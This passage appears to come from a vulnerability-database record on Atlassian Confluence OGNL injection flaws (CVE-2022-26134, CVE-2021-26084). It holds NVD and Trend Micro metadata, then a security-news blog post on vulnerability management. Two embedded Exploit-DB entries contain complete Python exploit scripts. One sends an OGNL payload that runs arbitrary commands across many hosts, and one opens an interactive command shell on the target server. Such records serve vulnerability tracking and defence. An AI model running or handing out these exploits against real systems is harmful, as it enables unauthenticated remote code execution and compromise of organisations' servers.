7.4.17, from 7.13.0 before 7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0 before 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 7.18.1.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T22:15:00", "type": "cve", "title": "CVE-2022-26134", "cwe": ["CWE-74"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-30T06:15:00", "cpe": ["cpe:/a:atlassian:confluence_data_center:7.18.0", "cpe:/a:atlassian:confluence_server:7.18.0"], "id": "CVE-2022-26134", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26134", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:atlassian:confluence_data_center:7.18.0:*:*:*:*:*:*:*", "cpe:2.3:a:atlassian:confluence_server:7.18.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-06-10T17:24:19", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-30T07:15:00", "type": "cve", "title": "CVE-2021-26084", "cwe": ["CWE-74"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-06-10T14:26:00", "cpe": [], "id": "CVE-2021-26084", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-26084", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "trendmicroblog": [{"lastseen": "2021-09-21T16:35:19", "description": "Recently, we discovered that the cryptomining trojan z0Miner has been taking advantage of the Atlassian\u2019s Confluence remote code execution (RCE) vulnerability assigned as CVE-2021-26084, which was disclosed by Atlassian in August.", "cvss3": {}, "published": "2021-09-21T00:00:00", "type": "trendmicroblog", "title": "Cryptominer z0Miner Uses Newly Discovered Vulnerability CVE-2021-26084 to Its Advantage", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-21T00:00:00", "id": "TRENDMICROBLOG:1333714193E63A3E616DE66054C5D640", "href": "https://www.trendmicro.com/en_us/research/21/i/cryptominer-z0miner-uses-newly-discovered-vulnerability-cve-2021.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-10T18:37:14", "description": "We look into campaigns that exploit the following server vulnerabilities: CVE-2021-26084, CVE-2020-14882, CVE-2020-14750, and CVE-2020-14883.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-18T00:00:00", "type": "trendmicroblog", "title": "Tracking CVE-2021-26084 and Other Server-Based Vulnerability Exploits via Trend Micro Cloud One and Trend Micro Vision One", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882", "CVE-2020-14883", "CVE-2021-26084"], "modified": "2021-10-18T00:00:00", "id": "TRENDMICROBLOG:608F794950B54766A75ABA93823701D0", "href": "https://www.trendmicro.com/en_us/research/21/j/tracking-cve-2021-26084-and-other-server-vulnerability-exploits.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-10-18T14:36:36", "description": "We look into campaigns that exploit the following server vulnerabilities: CVE-2021-26084, CVE-2020-14882, CVE-2020-14750, and CVE-2020-14883.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-18T00:00:00", "type": "trendmicroblog", "title": "Tracking CVE-2021-26084 and Other Server-Based Vulnerability Exploits via Trend Micro Cloud One and Trend Micro Vision One", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882", "CVE-2020-14883", "CVE-2021-26084"], "modified": "2021-10-18T00:00:00", "id": "TRENDMICROBLOG:C00F7F935E0D1EAD0509B4C376B20A1F", "href": "https://www.trendmicro.com/en_us/research/21/j/tracking-cve-2021-26084-and-other-server-vulnerability-exploits.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2022-08-03T11:59:46", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-10T00:00:00", "type": "exploitdb", "title": "Confluence Data Center 7.18.0 - Remote Code Execution (RCE)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2022-26134", "CVE-2022-26134"], "modified": "2022-06-10T00:00:00", "id": "EDB-ID:50952", "href": "https://www.exploit-db.com/exploits/50952", "sourceData": "# Exploit Title: Confluence Data Center 7.18.0 - Remote Code Execution (RCE)\r\n# Google Dork: N/A\r\n# Date: 06/006/2022\r\n# Exploit Author: h3v0x\r\n# Vendor Homepage: https://www.atlassian.com/\r\n# Software Link: https://www.atlassian.com/software/confluence/download-archives\r\n# Version: All < 7.4.17 versions before 7.18.1\r\n# Tested on: -\r\n# CVE : CVE-2022-26134\r\n# https://github.com/h3v0x/CVE-2022-26134\r\n\r\n#!/usr/bin/python3\r\n\r\nimport sys\r\nimport requests\r\nimport optparse\r\nimport multiprocessing\r\n\r\nfrom requests.packages import urllib3\r\nfrom requests.exceptions import MissingSchema, InvalidURL\r\nurllib3.disable_warnings()\r\n\r\nrequestEngine = multiprocessing.Manager()\r\nsession = requests.Session()\r\n\r\nglobal paramResults\r\nparamResults = requestEngine.list()\r\nglobals().update(locals())\r\n\r\ndef spiderXpl(url):\r\n globals().update(locals())\r\n if not url.startswith('http'):\r\n url='http://'+url\r\n \r\n headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36\",\r\n \"Connection\": \"close\",\r\n \"Accept-Encoding\": \"gzip, deflate\"}\r\n\r\n try:\r\n response = requests.get(url + '/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22'+optionsOpt.command+'%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/', headers=headers, verify=False, allow_redirects=False)\r\n if(response.status_code == 302):\r\n print('Found: '+url+' // '+ response.headers['X-Cmd-Response'])\r\n\r\n inputBuffer = str(response.headers['X-Cmd-Response'])\r\n paramResults.append('Vulnerable application found:'+url+'\\n''Command result:'+inputBuffer+'\\n')\r\n else:\r\n pass\r\n\r\n except requests.exceptions.ConnectionError:\r\n print('[x] Failed to Connect: '+url)\r\n pass\r\n except multiprocessing.log_to_stderr:\r\n pass\r\n except KeyboardInterrupt:\r\n print('[!] Stoping exploit...')\r\n exit(0)\r\n except (MissingSchema, InvalidURL):\r\n pass\r\n \r\n \r\ndef banner():\r\n print('[-] CVE-2022-26134')\r\n print('[-] Confluence Pre-Auth Remote Code Execution via OGNL Injection \\n')\r\n\r\n \r\ndef main():\r\n banner()\r\n \r\n globals().update(locals())\r\n \r\n sys.setrecursionlimit(100000)\r\n\r\n if not optionsOpt.filehosts:\r\n url = optionsOpt.url\r\n spiderXpl(url)\r\n else:\r\n f = open(optionsOpt.filehosts)\r\n urls = map(str.strip, f.readlines())\r\n\r\n multiReq = multiprocessing.Pool(optionsOpt.threads_set)\r\n try:\r\n multiReq.map(spiderXpl, urls)\r\n multiReq.close()\r\n multiReq.join()\r\n except UnboundLocalError:\r\n pass\r\n except KeyboardInterrupt:\r\n exit(0)\r\n\r\n\r\n if optionsOpt.output:\r\n print(\"\\n[!] Saving the output result in: %s\" % optionsOpt.output)\r\n\r\n with open(optionsOpt.output, \"w\") as f:\r\n for result in paramResults:\r\n f.write(\"%s\\n\" % result)\r\n f.close()\r\n\r\nif __name__ == \"__main__\":\r\n parser = optparse.OptionParser()\r\n\r\n parser.add_option('-u', '--url', action=\"store\", dest=\"url\", help='Base target uri (ex. http://target-uri/)')\r\n parser.add_option('-f', '--file', dest=\"filehosts\", help='example.txt')\r\n parser.add_option('-t', '--threads', dest=\"threads_set\", type=int,default=10)\r\n parser.add_option('-m', '--maxtimeout', dest=\"timeout\", type=int,default=8)\r\n parser.add_option('-o', '--output', dest=\"output\", type=str, default='exploit_result.txt')\r\n parser.add_option('-c', '--cmd', dest=\"command\", type=str, default='id')\r\n optionsOpt, args = parser.parse_args()\r\n\r\n main()", "sourceHref": "https://www.exploit-db.com/download/50952", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-07T06:05:16", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T00:00:00", "type": "exploitdb", "title": "Confluence Server 7.12.4 - &#039;OGNL injection&#039; Remote Code Execution (RCE) (Unauthenticated)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-26084", "CVE-2021-26084"], "modified": "2021-09-01T00:00:00", "id": "EDB-ID:50243", "href": "https://www.exploit-db.com/exploits/50243", "sourceData": "# Exploit Title: Confluence Server 7.12.4 - 'OGNL injection' Remote Code Execution (RCE) (Unauthenticated)\r\n# Date: 01/09/2021\r\n# Exploit Author: h3v0x\r\n# Vendor Homepage: https://www.atlassian.com/\r\n# Software Link: https://www.atlassian.com/software/confluence/download-archives\r\n# Version: All < 7.12.x versions before 7.12.5\r\n# Tested on: Linux Distros \r\n# CVE : CVE-2021-26084\r\n\r\n#!/usr/bin/python3\r\n\r\n# References: \r\n# https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html\r\n# https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md\r\n\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport optparse\r\n\r\nparser = optparse.OptionParser()\r\nparser.add_option('-u', '--url', action=\"store\", dest=\"url\", help=\"Base target host: http://confluencexxx.com\")\r\nparser.add_option('-p', '--path', action=\"store\", dest=\"path\", help=\"Path to exploitation: /pages/createpage-entervariables.action?SpaceKey=x\")\r\n\r\noptions, args = parser.parse_args()\r\nsession = requests.Session()\r\n\r\nurl_vuln = options.url\r\nendpoint = options.path\r\n\r\nif not options.url or not options.path:\r\n\r\n print('[+] Specify an url target')\r\n print('[+] Example usage: exploit.py -u http://xxxxx.com -p /pages/createpage-entervariables.action?SpaceKey=x')\r\n print('[+] Example help usage: exploit.py -h')\r\n exit()\r\n\r\n\r\ndef banner():\r\n\r\n print('---------------------------------------------------------------')\r\n print('[-] Confluence Server Webwork OGNL injection')\r\n print('[-] CVE-2021-26084')\r\n print('[-] https://github.com/h3v0x')\r\n print('--------------------------------------------------------------- \\n')\r\n\r\n\r\ndef cmdExec():\r\n\r\n while True:\r\n cmd = input('> ')\r\n xpl_url = url_vuln + endpoint\r\n xpl_headers = {\"User-Agent\": \"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36\", \"Connection\": \"close\", \"Content-Type\": \"application/x-www-form-urlencoded\", \"Accept-Encoding\": \"gzip, deflate\"}\r\n xpl_data = {\"queryString\": \"aaaaaaaa\\\\u0027+{Class.forName(\\\\u0027javax.script.ScriptEngineManager\\\\u0027).newInstance().getEngineByName(\\\\u0027JavaScript\\\\u0027).\\\\u0065val(\\\\u0027var isWin = java.lang.System.getProperty(\\\\u0022os.name\\\\u0022).toLowerCase().contains(\\\\u0022win\\\\u0022); var cmd = new java.lang.String(\\\\u0022\"+cmd+\"\\\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\\\u0022cmd.exe\\\\u0022, \\\\u0022/c\\\\u0022, cmd); } else{p.command(\\\\u0022bash\\\\u0022, \\\\u0022-c\\\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\\\u0022\\\\u0022; var output = \\\\u0022\\\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\\\u0027)}+\\\\u0027\"}\r\n rawHTML = session.post(xpl_url, headers=xpl_headers, data=xpl_data)\r\n\r\n soup = BeautifulSoup(rawHTML.text, 'html.parser')\r\n queryStringValue = soup.find('input',attrs = {'name':'queryString', 'type':'hidden'})['value']\r\n print(queryStringValue)\r\n\r\n\r\nbanner()\r\ncmdExec()", "sourceHref": "https://www.exploit-db.com/download/50243", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "avleonov": [{"lastseen": "2022-07-06T14:56:26", "description": "Hello everyone! In this episode, I will try to revive Security News with a focus on Vulnerability Management.\n\nOn the one hand, creating such reviews requires free time, which could be spent more wisely, for example, on open source projects or original research. On the other hand, there are arguments in favor of news reviews. Keeping track of the news is part of our job as vulnerability and security specialists. And preferably not only headlines.\n\nAlternative video link (for Russia): <https://vk.com/video-149273431_456239095>\n\nI usually follow the news using my automated telegram channel [@avleonovnews](<https://t.me/avleonovnews>). And it looks like this: I see something interesting in the channel, I copy it to Saved Messages so that I can read it later. Do I read it later? Well, usually not. Therefore, the creation of news reviews motivates to read and clear Saved Messages. Just like doing Microsoft Patch Tuesday reviews motivates me to watch what&#x27;s going on there. In general, it seems it makes sense to make a new attempt. Share in the comments what you think about it. Well, if you want to participate in the selection of news, I will be glad too.\n\nI took 10 news items from Saved Messages and divided them into 5 categories:\n\n 1. Active Vulnerabilities\n 2. Data sources\n 3. Analytics\n 4. VM vendors write about Vulnerability Management\n 5. de-Westernization of IT\n\n# Active Vulnerabilities\n\n##  &quot;CISA warns of hackers exploiting PwnKit Linux vulnerability (CVE-2021-4034)&quot; by [BleepingComputer](<https://www.bleepingcomputer.com/news/security/cisa-warns-of-hackers-exploiting-pwnkit-linux-vulnerability/>)\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) has added a high-severity Linux vulnerability known as PwnKit to its list of bugs exploited in the wild. Unprivileged users can exploit this vulnerabilities to gain full root privileges on Linux systems with default configurations. Reliable proof-of-concept (PoC) exploit code has been shared online less than three hours after Qualys published technical details for PwnKit. It was January 25th. The vulnerability was found in the Polkit&#x27;s pkexec component used by all major distributions (including Ubuntu, Debian, Fedora, and CentOS). It has been hiding in plain sight for more than 12 years since pkexec&#x27;s first release in May 2009.\n\nThe US cybersecurity agency gave all Federal Civilian Executive Branch (FCEB) agencies three weeks, until July 18, to patch their Linux servers against PwnKit and block exploitation attempts. Even though this directive only applies to federal agencies, CISA also strongly urged all US organizations from the private and public sectors to prioritize patching this bug.\n\n_Well, it would be correct to say that not only the Americans should quickly patch this._\n\n##  &quot;Atlassian Confluence OGNL Injection Remote Code Execution (RCE) Vulnerability (CVE-2022-26134)&quot; by [Qualys](<https://blog.qualys.com/vulnerabilities-threat-research/2022/06/29/atlassian-confluence-ognl-injection-remote-code-execution-rce-vulnerability-cve-2022-26134>)\n\nOn June 02, 2022, Atlassian published a security advisory about a critical severity Unauthenticated Remote Code Execution vulnerability affecting Confluence Server and Data Center. According to the advisory, the vulnerability is being actively exploited and Confluence Server and Data Center versions after 1.3.0 are affected. In order to exploit a vulnerable server, a remote attacker can send a malicious HTTP GET request with an OGNL payload in the URI. The vulnerable server once exploited would allow the attacker to execute commands remotely with user privileges running the Confluence application.\n\nTo detect CVE-2022-26134, the detection sends HTTP GET request with a specially crafted OGNL payload to determine the vulnerability on the target Confluence application. The OGNL payload creates a custom HTTP response header containing the output of the system command executed on Linux and Windows systems. The detection also consists of a Qualys customized OGNL payload which is platform-independent, eliminating false positives and works irrespective of the host operating system by creating a custom HTTP response header with Qualys specified value.\n\n_In this detailed technical article, Mayank Deshmukh from Qualys describes OGNL Injection, RCE Payload, Exploit POC, Exploit Analysis and Source Code Analysis. If you are interested in how such vulnerabilities are exploited and detected, check out this article._\n\n# Data sources\n\n##  &quot;New Vulnerability Database Catalogs Cloud Security Issues&quot; by [DarkReading](<https://www.darkreading.com/cloud/new-initiative-seeks-to-shed-light-on-cloud-vulnerabilities>)\n\nOrganizations traditionally have struggled to track vulnerabilities in public cloud platforms and services because of the lack of a common vulnerability enumeration (CVE) program like the one that MITRE maintains for publicly disclosed software security issues. A new community-based database launched this week seeks to begin addressing that issue by providing a central repository of information on known cloud service-provider security issues and the steps organizations can take to mitigate them.\n\nThe database \u2014 [cloudvulndb.org](<http://cloudvulndb.org>) \u2014 is the brainchild of security researchers at Wiz, who for some time have been advocating the need for a public catalog of known security flaws on platforms and services run by the likes of AWS, Microsoft, and Google. The database currently lists some 70 cloud security issues and vulnerabilities. Such as Azure Open Management Infrastructure (OMI) Elevation of Privilege, OMIGOD. Anyone is free to suggest new issues to add to the website or to suggest new fixes to existing issues.\n\n_It&#x27;s not clear if a separate database is really needed. It seems that all of these entries can be added as NVD CVEs. Moreover, many vulnerabilities in this database already have CVE IDs. But the initiative is good. It proves once again that MITRE and NVD have problems with coverage._\n\n* * *\n\n# Analytics\n\n##  &quot;MITRE shares this year&#x27;s list of most dangerous software bugs (CWE Top 25)&quot; by [BleepingComputer](<https://www.bleepingcomputer.com/news/security/mitre-shares-this-years-list-of-most-dangerous-software-bugs/>)\n\nMITRE shared this year&#x27;s top 25 most common and dangerous weaknesses impacting software throughout the previous two calendar years. These bugs are considered dangerous because they&#x27;re usually easy to discover, come with a high impact, and are prevalent in software released during the last two years.\n\n_Let&#x27;s see what&#x27;s on top:_\n \n \n 1 CWE-787 Out-of-bounds Write \n 2 CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') \n 3 CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') \n 4 CWE-20 Improper Input Validation \n 5 CWE-125 Out-of-bounds Read \n 6 CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')\n\n_Seems to be true, although &#x27;OS Command Injection&#x27; could be higher. Well, we need to remember that CWE identifiers are assigned manually to vulnerabilities by some analysts and therefore there may be classification errors. But it&#x27;s still interesting._\n\n##  &quot;Cyberattacks via Unpatched Systems Cost Orgs More Than Phishing&quot; by [DarkReading](<https://www.darkreading.com/vulnerabilities-threats/cyberattacks-bug-exploits-more-costly-incidents>)\n\n_This article is based on research of Tetra Defense, a leading incident response, cyber risk management and digital forensics firm based in Madison, Wisconsin._\n\nAttackers continue to find significant success targeting unpatched servers and vulnerable remote-access systems, researchers say -- and these types of compromises cost victim organizations 54% more than compromises caused by user actions (i.e., falling for phishing and opening malicious documents).\n\nAccording to a report by Tetra Defense, which analyzed incident data from the first quarter, unpatched vulnerabilities and exposing risky services\u2014such as Remote Desktop Protocol (RDP)\u2014account for 82% of successful attacks, while social-engineering employees to take some action accounted for just 18% of successful compromises. The article also mentions known vulnerabilities ProxyShell exploit for Microsoft Exchange servers, Log4Shell vulnerability in Java Log4j library.\n\nTwo controls -- comprehensive patching and using multifactor authentication (MFA) -- could have prevented nearly 80% of the investigated incidents.\n\n_Good point in the article: &quot;Data on successful compromises can help companies determine the most critical attack vectors to address, but it should be noted that the conclusions depend greatly on the specific incident-response firm&quot;. But the fact that MFA and patching is very important is true._\n\n##  &quot;Zero-Days Aren&#x27;t Going Away Anytime Soon &amp; What Leaders Need to Know&quot; by [DarkReading](<https://www.darkreading.com/attacks-breaches/zero-days-aren-t-going-away-anytime-soon-and-what-leaders-need-to-know>)\n\n_The article was written by Dan Schiappa, Chief Product Officer of Arctic Wolf, Security Operations company_.\n\nBoth Google and Mandiant tracked a record number of zero-days last year. More zero-days are being discovered because security companies are getting better at finding them \u2014 not necessarily because hackers are coming up with new vulnerabilities. Not all zero-days are created equal. Some require sophisticated and novel techniques, like the attack on SolarWinds, and others exploit simple vulnerabilities in commonly used programs like Windows. Thankfully, there&#x27;s some basic cyber hygiene strategies that can keep your organization sufficiently prepared to mitigate zero-day exploits.\n\n 1. Ensure that the technology your organization has is sufficient for protecting from the unknown. Many zero-days may never hit a hard drive, so pointing threat detection tools there could be fruitless.\n 2. Patching is integral to protection against exploits. Staying on top of guidance from industry organizations like International Information System Security Certification Consortium (ISC)2 or federal authorities like the Cybersecurity and Infrastructure Security Agency is a good way to prioritize the exploit.\n 3. Zero-day exploits are those that the vendor doesn&#x27;t know exist, and therefore no patch is available. In some cases, protection technologies can use behavioral detections to block certain activities, while in other cases, using detection technologies or human expertise in a security operations center is the only defense. Investing in the human element of security will place an organization in the best position to limit the financial and data losses zero-days can incur.\n\nWhile patching is proper preparation, the investment in trained security professionals, in-house or outsourced, is the best defense against zero-days.\n\n_In general, I agree with everything. My opinion: while critical known vulnerabilities are not fixed promptly, it is premature to think about Zero-Days. And of course, dealing with Zero-Days is primarily the task of the SOC._\n\n# VM vendors write about Vulnerability Management\n\n_I would like to start here with an article with a provocative title_\n\n##  &quot;Why We&#x27;re Getting Vulnerability Management Wrong&quot; by [DarkReading](<https://www.darkreading.com/vulnerabilities-threats/why-we-re-getting-vulnerability-management-wrong>)\n\n_The article was written by Liran Tancman, CEO of Rezilion, a platform vendor that allows you to map, validate and eliminate software vulnerabilities._\n\nSometimes, too much information is a mixed blessing. Security teams use multiple vulnerability scanners in an attempt to cope with a significant rise in both attack surface diversity and software vulnerabilities. But they soon find themselves overwhelmed with results, which leads to a growing backlog of bugs that need to be fixed.\n\n[A recent analysis from RAND Corporation](<https://weis2019.econinfosec.org/wp-content/uploads/sites/6/2019/05/WEIS_2019_paper_53.pdf>) found no notable reduction of breaches in organizations with mature vulnerability management programs.\n\n_By the way, an interesting study, it would be right to give it a separate episode, I guess. Leave a comment if you&#x27;d like it._\n\n[Rezilion&#x27;s own runtime research analysis](<https://www.rezilion.com/runtime-analysis-research/>) finds, on average, only 15% of discovered vulnerabilities are loaded into memory, which makes them exploitable. That means, on average, only 15% of flaws require priority patching \u2014 or patching at all. \n\n_Also an interesting topic that deserves a separate episode._\n\nRezilion conducted an analysis of 20 of the most popular container images. The findings showed more than 4,347 known vulnerabilities. 75% of those rated as critical or high in severity did not load to memory and posed no risk. Organizations can use runtime analysis to prioritize remediation of vulnerabilities. A vulnerability in a package that isn&#x27;t being loaded to memory can&#x27;t be exploited by an attacker.\n\n_This is a long-standing dispute: is it necessary to fix vulnerabilities in software that is not running at the moment? Well, usually the answer is yes, it is necessary. Because no one can guarantee that the software will suddenly not be launched. But if it is possible to identify vulnerabilities in software that is currently running or was launched not so long ago, then this is a good source of data for additional prioritization. Why not. It&#x27;s good that Rezilion highlights this._\n\n##  &quot;Risk-based Remediation Powered by Patch Management in Qualys VMDR 2.0&quot; by [Qualys](<https://blog.qualys.com/product-tech/2022/06/22/risk-based-remediation-powered-by-patch-management-in-qualys-vmdr-2-0>)\n\n_To tell the truth, I have long been interested in what&#x27;s new in Qualys Vulnerability Management, Detection and Response._\n\nAccording to the recently released Verizon DBIR report, vulnerability exploitation continued to be one of the top three attack vectors exploited by bad actors in 2021 to break into organizations. As of this writing, it\u2019s only June, but more than 10,000 vulnerabilities have already been disclosed in 2022, according to the National Vulnerability Database (NVD). As if that weren\u2019t bad enough, the rate of increase of ransomware attacks last year was more than the last five years combined.\n\n 1. The resources required to patch all these vulnerabilities have not kept up with the pace at which vulnerabilities are disclosed and exploited.\n 2. The correct remediation path is not always straightforward. In some cases, patching a vulnerability can require deploying a patch, making a configuration change, or both.\n\nAll these introduce delays in the remediation process.\n\nQualys VMDR 2.0 introduces TruRisk scores that help organizations prioritize vulnerabilities based on risk ratings that weigh multiple factors such as exploit code maturity, exploitation in the wild, and multiple other factors that accurately measure risk.\n\n_In general, it looks like Tenable vulnerability priority rating (VPR). It&#x27;s probably generated the same way. But the technical details of TruRisk are not given here._\n\nA key step in any remediation workflow is good communication between the vulnerability management (VM) team and the remediation team. However, these two teams use different products and different terminology. The VM team understands the risk and QIDs. The remediation team understands patches. Qualys maps the selected vulnerabilities to the right patches and configuration changes required to remediate them specific to the organization\u2019s unique environment. For some assets, this entire process can be automated 